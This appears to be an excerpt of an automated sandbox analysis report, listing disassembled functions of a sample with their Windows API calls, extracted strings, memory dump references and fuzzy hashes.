Opcode Fuzzy Hash: 6e28f728964888884b43c830900d15e85c63fb046ea0cdd1b1aa4925e3a1b78f
Instruction Fuzzy Hash: 9F2130B0E44648AFEB00EFA9C942BAEB7B4EF48704F10452AF514FB281D6785D40CF69

Function 00413EFC Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413F44
GetWindowLongA.USER32(?,000000F0), ref: 00413F4F
GetWindowLongA.USER32(?,000000F4), ref: 00413F61
SetWindowLongA.USER32(?,000000F4,?), ref: 00413F74
SetPropA.USER32(?,00000000,00000000), ref: 00413F8B
SetPropA.USER32(?,00000000,00000000), ref: 00413FA2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 80be7c5fd3293882fd9e5d9268d8f30720bc213fea8bed4e6b8163be88334944
Instruction ID: 9a8beaef8ab21b915b85c42da66531f7de09406bb5014a971ac74c4da0611af1
Opcode Fuzzy Hash: 80be7c5fd3293882fd9e5d9268d8f30720bc213fea8bed4e6b8163be88334944
Instruction Fuzzy Hash: 87213C76604244FFCF41DF99DC84E963BF8EB09314F0441A2B958DB2A2C338D984DB65

Function 004306E8 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(00000000), ref: 004306FD
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00430707
GlobalLock.KERNEL32(00000000), ref: 00430727
GlobalLock.KERNEL32(00000000), ref: 00430732
GlobalUnlock.KERNEL32(00000000), ref: 0043075B
GlobalUnlock.KERNEL32(00000000), ref: 00430764

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Global$LockUnlock$AllocSize
String ID:
API String ID: 2787281350-0
Opcode ID: 091f3411acc26ccc4fe2c962f24572760e17ac257a51ffb372c6958b30889641
Instruction ID: 511091ac60f191800183bcaa5a6581aa9e09047655acc96c8b3502ad05f865f7
Opcode Fuzzy Hash: 091f3411acc26ccc4fe2c962f24572760e17ac257a51ffb372c6958b30889641
Instruction Fuzzy Hash: B511C675A04204AFDF10EAF99955AAF77ECDB48714F20457AB504E72C0D6389D40CF58

Function 00413F1C Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413F44
GetWindowLongA.USER32(?,000000F0), ref: 00413F4F
GetWindowLongA.USER32(?,000000F4), ref: 00413F61
SetWindowLongA.USER32(?,000000F4,?), ref: 00413F74
SetPropA.USER32(?,00000000,00000000), ref: 00413F8B
SetPropA.USER32(?,00000000,00000000), ref: 00413FA2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 2b78ea7f0ede15578f477168fe3594382171a1ee6fdb2de5cb5d4f5295374d3a
Instruction ID: 0475c2340807998f7fbadf732e4435dcd87974ea3d00b0fd314abe57a5cec416
Opcode Fuzzy Hash: 2b78ea7f0ede15578f477168fe3594382171a1ee6fdb2de5cb5d4f5295374d3a
Instruction Fuzzy Hash: B211D776500244FFDF40DF9ADD84E9A3BEDEB08364F104266B918DB2A1D738E980DB65

Function 0043550C Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

ValidateRect.USER32(00000000,00000000), ref: 0043551C
InvalidateRect.USER32(00000000,00000000,00000001,00000000,00000000), ref: 0043552D
GetClientRect.USER32(00000000), ref: 0043553B
MapWindowPoints.USER32(00000000,00000000,00000000,00000002), ref: 0043555B
ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,00000000,00000001,00000000,00000000), ref: 0043556D
InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,00000000,00000001,00000000,00000000), ref: 00435585

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Rect$InvalidateValidate$ClientPointsWindow
String ID:
API String ID: 2846033224-0
Opcode ID: 1bf9a01e2bff835698012f325456f97f5ade9e1a666d858b498ee4a17d2ae1d9
Instruction ID: 081669fb4964d69b50ec49b8d670bff99985cd60951a8ab7ffe4411c53b3fc26
Opcode Fuzzy Hash: 1bf9a01e2bff835698012f325456f97f5ade9e1a666d858b498ee4a17d2ae1d9
Instruction Fuzzy Hash: 73F0C9B061260167DA40F67A8CC7F8F229C9F0874CF00083F7514EB183CEBD9944466D

Function 0041CAC4 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041BFE4: CreateBrushIndirect.GDI32 ref: 0041C04F

UnrealizeObject.GDI32(00000000), ref: 0041CAD0
SelectObject.GDI32(?,00000000), ref: 0041CAE2
SetBkColor.GDI32(?,00000000), ref: 0041CB05
SetBkMode.GDI32(?,00000002), ref: 0041CB10
SetBkColor.GDI32(?,00000000), ref: 0041CB2B
SetBkMode.GDI32(?,00000001), ref: 0041CB36

Part of subcall function 0041B938: GetSysColor.USER32(000000FF), ref: 0041B942

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: b4d0a746b806976f425bc3fb005ce4d49d325b56bd3ef4c59502e2a3fe48b3d5
Instruction ID: 0fe17cd44e85db5f06769ace0944a50c9c7c91bf67c4211387a80117c4ee025e
Opcode Fuzzy Hash: b4d0a746b806976f425bc3fb005ce4d49d325b56bd3ef4c59502e2a3fe48b3d5
Instruction Fuzzy Hash: F0F0B6B12002009BCE04FFBADEC6D5B2B98EF04309704409AB908EF297CA7CD8518F79

Function 0045C278 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 246windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00406264: LoadStringA.USER32(00400000,?,?,00000400), ref: 00406281

LoadBitmapA.USER32(00400000,?), ref: 0045C63A

Part of subcall function 00420038: GetObjectA.GDI32(?,00000018,?), ref: 00420063

LoadBitmapA.USER32(00400000,?), ref: 0045C663

Strings

N/, xrefs: 0045C352
C_TO_LEFT, xrefs: 0045C626
C_TO_RIGHT, xrefs: 0045C64F

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Load$Bitmap$ObjectString
String ID: C_TO_LEFT$C_TO_RIGHT$N/
API String ID: 2822921229-3586936002
Opcode ID: 8e35ce3c2fef3043b9fae8b7d30481944eefe467075a587f729bfc68ce826fc3
Instruction ID: 6e894112d758f52f78e1f7f858f4dd37204a6bc8d917debc3b67541e1bd87bc7
Opcode Fuzzy Hash: 8e35ce3c2fef3043b9fae8b7d30481944eefe467075a587f729bfc68ce826fc3
Instruction Fuzzy Hash: 1EB1D8346042448BCB00FFE5C581ACD77B5AF48304F64C67AAC05AF35ADA78AE5ECB65

Function 00490DC8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000400,00000000,00000000), ref: 00490E40

Part of subcall function 00441A34: SendMessageA.USER32(00000000,00000467,00000000,00000000), ref: 00441AC3

Part of subcall function 0042BA04: SendMessageA.USER32(00000000,00000147,00000000,00000000), ref: 0042BA18

Strings

XXX, xrefs: 00490E87, 00490F7C
N/, xrefs: 00490DF0, 00490DFE, 00490E0C, 00490E17
XXXX, xrefs: 00490EB5, 00490FB9
ticalSection, xrefs: 00490DE2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Message$Send$Post
String ID: N/$XXX$XXXX$ticalSection
API String ID: 3628032766-1455688121
Opcode ID: 9e5b708fd11f9d1a2cf69a6b3608748182261e20d54ddca6490e732d0bff21da
Instruction ID: 474c4bcb17993fca91dc9a00e36fb12c2e857f038c6dfb8545c75aa9934371c5
Opcode Fuzzy Hash: 9e5b708fd11f9d1a2cf69a6b3608748182261e20d54ddca6490e732d0bff21da
Instruction Fuzzy Hash: D0715B306015459FDF11EF29C486B9A7BA0EF54304F1844BAFC09AF766DB39AE81CB58

Function 004904A8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 144windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000400,00000000,00000000), ref: 00490538

Strings

XXXX, xrefs: 004905DC
N/, xrefs: 004904E8, 004904F6, 00490504, 0049050F, 00490683
XXX, xrefs: 004905BF
ticalSection, xrefs: 004904DA, 00490631, 0049064C, 00490674

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessagePost
String ID: N/$XXX$XXXX$ticalSection
API String ID: 410705778-1455688121
Opcode ID: a589f13e820c030aaa3c9a32b52d6071109d4acac555a32ae8a20f2471457549
Instruction ID: 7e0616a2f6a1a79838001fc7852c7fa4445d52626df2e80a023abe42bddb85f5
Opcode Fuzzy Hash: a589f13e820c030aaa3c9a32b52d6071109d4acac555a32ae8a20f2471457549
Instruction Fuzzy Hash: 1D517D70601244AFDB10EF59D885BD97BE5EF85314F1484B6EC08AF3A6CB78AD44CB58

Function 004021F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(\$,00000000,00402382,?,000A2568,?,00000000,?,?,00401C29,00401C3E,00401D82), ref: 00402244
RtlLeaveCriticalSection.KERNEL32(\$,00402389,000A2568,?,00000000,?,?,00401C29,00401C3E,00401D82), ref: 0040237C

Part of subcall function 004019AC: RtlInitializeCriticalSection.KERNEL32(\$,00000000,00401A62), ref: 004019C2
Part of subcall function 004019AC: RtlEnterCriticalSection.KERNEL32(\$,\$,00000000,00401A62), ref: 004019D5
Part of subcall function 004019AC: LocalAlloc.KERNEL32(00000000,00000FF8,\$,00000000,00401A62), ref: 004019FF
Part of subcall function 004019AC: RtlLeaveCriticalSection.KERNEL32(\$,00401A69,00000000,00401A62), ref: 00401A5C

Strings

P$, xrefs: 004021FB, 00402359
#, xrefs: 00402274
\$, xrefs: 0040223F, 00402377

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: P$$\$$#
API String ID: 2227675388-346575108
Opcode ID: fe909d04de45bd1f940817ebc4ec8d0e8659c6b09bfcd7050855daf7aabe5b0a
Instruction ID: 02f41f915e88177f90c86673ebc375db218a0e1e70b3b0505487c15bc4466662
Opcode Fuzzy Hash: fe909d04de45bd1f940817ebc4ec8d0e8659c6b09bfcd7050855daf7aabe5b0a
Instruction Fuzzy Hash: 3441D270605210CFE7119B75EA4D3263BA0B74A308F28817FD944A72E1C3BC9986CB9D

Function 004311A4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004310C8: OpenClipboard.USER32(?), ref: 004310F6

EnumClipboardFormats.USER32(00000000), ref: 004311C8
GetClipboardData.USER32(00000000), ref: 004311E8
GetClipboardData.USER32(00000009), ref: 004311F1
EnumClipboardFormats.USER32(00000000), ref: 0043120D

Strings

hA, xrefs: 004311D6

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Clipboard$DataEnumFormats$Open
String ID: hA
API String ID: 2049918563-2144240161
Opcode ID: b3ba20aa11270024ee2906120c207441edf4d1bd3ced102cd97cb0cd2a864852
Instruction ID: 32897b5f9cc024ee0b63237190cefdd117be031c9eaddc9525d6c96cf1c139dd
Opcode Fuzzy Hash: b3ba20aa11270024ee2906120c207441edf4d1bd3ced102cd97cb0cd2a864852
Instruction Fuzzy Hash: F80104713042046ADB04B6FB5852ABBB29DCB89359F24407BF504EB2D2DD7D8C40512D

Function 00421DC4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,00421DB4,?), ref: 00421DE5
